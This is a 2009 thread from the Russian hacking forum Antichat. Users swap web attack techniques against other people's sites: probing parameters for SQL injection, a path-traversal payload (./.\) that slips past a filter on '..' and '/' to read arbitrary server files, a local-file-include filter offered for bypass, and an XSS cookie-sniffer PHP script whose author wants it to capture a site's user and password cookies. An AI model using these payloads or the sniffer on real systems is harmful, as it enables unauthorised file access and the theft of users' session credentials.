Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.03.2009, 23:28
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
Krist_ALL, ну и я свои 5 копеек вставлю... то что бывает не находятся бажные скрипты абсолютно нормально =) не уязвим этот параметр, так узвим другой... то есть смотри на параметры и так далее, так же не забывай что ошибки не всегда выводятся иногда просто вырублен их вывод... поэтому стоит понаблюдать за выводом при разных значениях, грубо говоря что если при news.php?a=1' не выводится новость, а при news.php?a=1 выводится то это м.б. скуль =) хотя не факт =) короче все методом проб и ошибок =)
|
|
|
31.03.2009, 23:43
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
На счёт бажных скриптов, то не только кавычку пихать надо, есть и другие способы имитировать ошибку БД...по поводу этого можно почитать в замечательном FAQ от jokester'a (http://forum.antichat.ru/thread104591.html)
Последний раз редактировалось -m0rgan-; 31.03.2009 в 23:45..
|
|
|
|
01.04.2009, 19:18
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Вот вопрос возник. Есть на php такой код, параметру lol= передаётся имя файла, и он его выдаёт на скачку из определённой директории.
Естественно таким образом можно скачать любой файл на сервере путём ../index.php например...
Но в скрипте стоит защита:
$getfile = str_replace("..", "", $getfile);
$getfile = str_replace("/", "", $getfile);
Которая фильтрует .. и / Вполне возможно что читать произвольные файлы на сервере всё равно можно как-то, если кто знает как это сделать, то напишите.
Желательно не в теории как это реализуется, а пример, как это сделать.
|
|
|
|
01.04.2009, 19:22
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
2 Nightmarе
можно попробывать закодировать ../ типа 0x2e2e2f
но точно не уверен..
|
|
|
|
01.04.2009, 19:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
<?php
$getfile = "%2E%2E%2F"; // =../
$getfile = str_replace("..", "", $getfile);
$getfile = str_replace("/", "", $getfile);
echo $getfile;
?>
|
|
|
|
01.04.2009, 19:34
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Пробовал на 2 хостах, не пашут оба варианта.
|
|
|
|
01.04.2009, 20:03
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
на винде:
lol=./.\file
Схема такая это ./.\ пройдёт первую проверку без изменений, а после второй срежется "/".
В итоге получим ..\
Если нужно ещё выше, думаю всё понятно ./.\./.\./.\ и т.д.
Тоесть "." впихнуть можно, а вот "/" будут резаться
|
|
|
|
01.04.2009, 20:07
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
К теме о Xss
Есть 3 имени cookie.
PHPSESSID, .sait.ru_c_user, .sait.ru_c_password
Как заставить скрипт записывать эти 3 параметра?:
<?
$data_filename = "data.txt";
$max_entries =0; // 0 для снятия лимита
require 'functions.php';
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes(urldecode($_SERVER['HTTP_REFERER'])));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
//$sniffed['query'] = ($_SERVER['QUERY_STRING']);
$sniffed['agent'] = htmlspecialchars(stripslashes($_SERVER['HTTP_USER_AGENT']));
$sniffed['real_ip'] = htmlspecialchars(stripslashes($_SERVER['HTTP_X_FORWARDED_FOR']));
$entrie = serialize($sniffed);
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
echo "<script>window.location.href='Location:http://www.sait.ru/;</script>";
?>
Супер переменная
$sniffed['query'] = ($_SERVER['QUERY_STRING']);
Записывает данные из PHPSESSID, как указать на то, чтобы она записывала данные из
.sait.ru_c_user, .sait.ru_c_password?
CMS платная, социалка ablespace |
|
|
|
01.04.2009, 20:28
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Похожий вопрос ... можно ли как нибудь обойти =>
<?
$file = $_REQUEST["file"];
$file = ereg_replace("[\\/]+", "/", $file);
$file = ereg_replace("\.+[\\/]", "", $file);
print $file."<br>";
if (strpos($file, "/long/")!==false)
{
echo "$file";
if (strpos($file, "/long_word/long/")===0 ||
strpos($file, "/very_long_word/")===0) include($_SERVER["DOCUMENT_ROOT"]."/".$file);
print $file;
}
?>
|
|
|
|
02.04.2009, 14:18
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
Сорри, если не туда запостил.
Может есть у кого словарь с именами таблиц/полей.
Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
